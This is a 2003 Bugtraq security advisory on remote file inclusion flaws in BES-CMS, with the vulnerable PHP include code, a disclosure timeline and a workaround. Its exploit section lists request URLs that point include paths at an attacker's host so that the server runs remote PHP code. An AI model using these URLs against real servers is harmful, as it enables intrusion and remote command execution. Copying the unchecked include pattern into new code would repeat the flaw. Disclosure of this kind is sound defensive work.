[SCSA-024] BES-CMS including file vulnerability

From: Security Corporation Security Advisory (advisory_at_security-corporation.com)
Date: 12/20/03

  • Next message: Przemyslaw Frasunek: "Re: Remote crash in tcpdump from OpenBSD"
    Date: Sat, 20 Dec 2003 22:21:03 +0100 (CET)
    To: bugtraq@securityfocus.com
    
    

    ======================================================================
    Security Corporation Security Advisory [SCSA-024]

    BES-CMS including file vulnerability
    ======================================================================

    PROGRAM: BES-CMS
    HOMEPAGE: http://bes.h6p.org
    VULNERABLE VERSIONS: 0.4 rc3, 0.5 rc3
    RISK: MEDIUM/HIGH
    IMPACT: Including of file

    RELEASE DATE: 2003-12-20

    ======================================================================
    TABLE OF CONTENTS
    ======================================================================

    1..........................................................DESCRIPTION
    2..............................................................DETAILS
    3.............................................................EXPLOITS
    4............................................................SOLUTIONS
    5...........................................................WORKAROUND
    6..................................................DISCLOSURE TIMELINE
    7..............................................................CREDITS
    8...........................................................DISCLAIMER
    9...........................................................REFERENCES
    10............................................................FEEDBACK

    1. DESCRIPTION
    ======================================================================

    "Bes-cms is a professional dynamic php website building tool. It was
    developped at mokka by a bored programmor. Bes-cms is capable of
    creating images galeries, message boards, news sections download
    sections contact sections and many more to be added on the
    plugin server."

    (direct quote from BES-CMS website)

    2. DETAILS
    ======================================================================

    - Including of file :

    A vulnerability has been discovered in BES-CMS that allows remote
    attackers to cause the script to include arbitrary PHP code
    (allows remote command execution).

    In : index.inc.php, Members/index.inc.php, Members/root/index.inc.php,
    we can see the following code :

    ----------------------------------------------------
    include_once($PATH__Includes."actions_default.php");
    ----------------------------------------------------

    In the Include/functions_folder.php file :
    ----------------------------------------------------
    include($PATH__Includes.'functions_folder_modules.php');

    include($PATH__Includes.'functions_folder_plugins.php');

    include($PATH__Includes.'functions_folder_files.php');
    ----------------------------------------------------

    In the Include/functions_hacking.php file :

    ----------------------------------------------------
    switch($_GET['itemID'])
    {
    case 'usershow':
    include_once("".$PATH__Includes."functions_user.php");
    Show_USer_Details($_GET['user']);
    break;
    [...]
    case 'send_bug':
    if ($UserDetails['LOGGED_IN'] == 'YES')
    {
    global $PATH__Includes;
    include_once("".$PATH__Includes."functions_error.php");
    send_bug_report();
    }
    break;
    [...]
    case 'content_view':
    global $PATH___Includes;
    include_once("".$PATH__Includes."functions_message_docTypes.php");
    Message_Centent_View($Plugin_Path);
    break;

    case 'logger':
    global $PATH__Includes;
    include_once("".$PATH__Includes."functions_users.php");
    Loggin_Message();
    break;

    case 'search':
    global $PATH__Includes;
    include_once("".$PATH__Includes."functions_general.php");
    Display_Search_Results($_POST['search_str']);
    break;
    [...]
    ----------------------------------------------------

    In the Include/functions_message.php file :

    ----------------------------------------------------
    include($PATH__Includes.'functions_message_docTypes.php');

    include($PATH__Includes.'functions_message_edit.php');
    ----------------------------------------------------

    and Include/Start.php file :

    -------------------------------------------
    include_once($inc_path."Include/vars.php");
    -------------------------------------------

    All these files are vulnerable...We can see that all inclusions of file
    begin by a indefinite variable in the code ($inc_path or $PATH_Includes)
    and so could be definite by an attacker.

    3. EXPLOITS
    ======================================================================

    - Including of file : (if register_globals=ON):

    - http://[target]/index.inc.php?PATH_Includes=http://[attacker]/
    http://[target]/Members/index.inc.php?PATH_Includes=http://[attacker]/
    http://[target]/Members/root/index.inc.php?PATH_Includes=http://[attacker]/

    Could include the file : http://[attacker]/actions_default.php

    - http://[target]/Include/functions_folder.php?PATH_Includes=
    http://[attacker]/

    Could include the files : http://[attacker]/functions_folder_modules.php
    http://[attacker]/functions_folder_plugins.php
    http://[attacker]/functions_folder_files.php

    - http://[target]/Include/functions_hacking.php?PATH_Includes=
    http://[attacker]/&itemID=usershow

    http://[target]/Include/functions_hacking.php?PATH_Includes=
    http://[attacker]/&itemID=logger

    Could include the file : http://[attacker]/functions_user.php

    - http://[target]/Include/functions_hacking.php?PATH_Includes=
    http://[attacker]/&itemID=send_bug&UserDetails[LOGGED_IN]=YES

    Could include the file : http://[attacker]/functions_error.php

    - http://[target]/Include/functions_hacking.php?PATH_Includes=
    http://[attacker]/&itemID=content_view

    Could include the file : http://[attacker]/functions_message_docTypes.php

    - http://[target]/Include/functions_hacking.php?PATH_Includes=
    http://[attacker]/&itemID=search

    Could include the file : http://[attacker]/functions_general.php

    - http://[target]/Include/functions_message.php?PATH_Includes=
    http://[attacker]/

    Could include the files : http://[attacker]/functions_message_docTypes.php
    http://[attacker]/functions_message_edit.php

    - http://[target]/Include/Start.php?inc_path=http://[attacker]/

    Could include the file : http://[attacker]/Include/vars.php

    4. SOLUTIONS
    ======================================================================

    You can found patch at the following link : http://www.phpsecure.info

    The creator was notified, published a secure version (version 0.5 rc4)

    5. WORKAROUND
    ======================================================================

    In index.inc.php, Members/index.inc.php, Members/root/index.inc.php,
    Include/functions_folder.php, Include/functions_hacking.php and
    Include/functions_message.php simply add the following line as FIRST LINE :

    -------------------------------------------
    if (isset($_REQUEST["PATH__Includes"])){ die("Patched by phpSecure.info");
    }
    -------------------------------------------

    And at the begining of the Include/Start.php file, add the following line
    as FIRST LINE :

    ------------------------------------------------------------------------
    if (isset($_REQUEST["inc_path"])){ die("Patched by phpSecure.info"); }
    ------------------------------------------------------------------------

    6. DISCLOSURE TIMELINE
    ======================================================================

    13/12/2003 Vulnerability discovered
    14/12/2003 Vendor notified
    15/12/2003 Vendor response
    15/12/2003 Security Corporation clients notified
    15/12/2003 Started e-mail discussions
    20/12/2003 Last e-mail received
    20/12/2003 Public disclosure

    7. CREDITS
    ======================================================================

    frog-m@n <frog-man@security-corporation.com> from
    http://www.phpsecure.info is credited with this discovery

    8. DISLAIMER
    ======================================================================

    The information within this paper may change without notice. Use of
    this information constitutes acceptance for use in an AS IS condition.
    There are NO warranties with regard to this information. In no event
    shall the author be liable for any damages whatsoever arising out of
    or in connection with the use or spread of this information. Any use
    of this information is at the user's own risk.

    9. REFERENCES
    ======================================================================

    - Original Version:
    http://www.security-corporation.com/advisories-024.html

    - Version Franšaise:
    http://www.security-corporation.com/index.php?id=advisories&a=024-FR

    10. FEEDBACK
    ======================================================================

    Please send suggestions, updates, and comments to:

    Security Corporation
    http://www.security-corporation.com
    advisory@security-corporation.com


  • Next message: Przemyslaw Frasunek: "Re: Remote crash in tcpdump from OpenBSD"

    Relevant Pages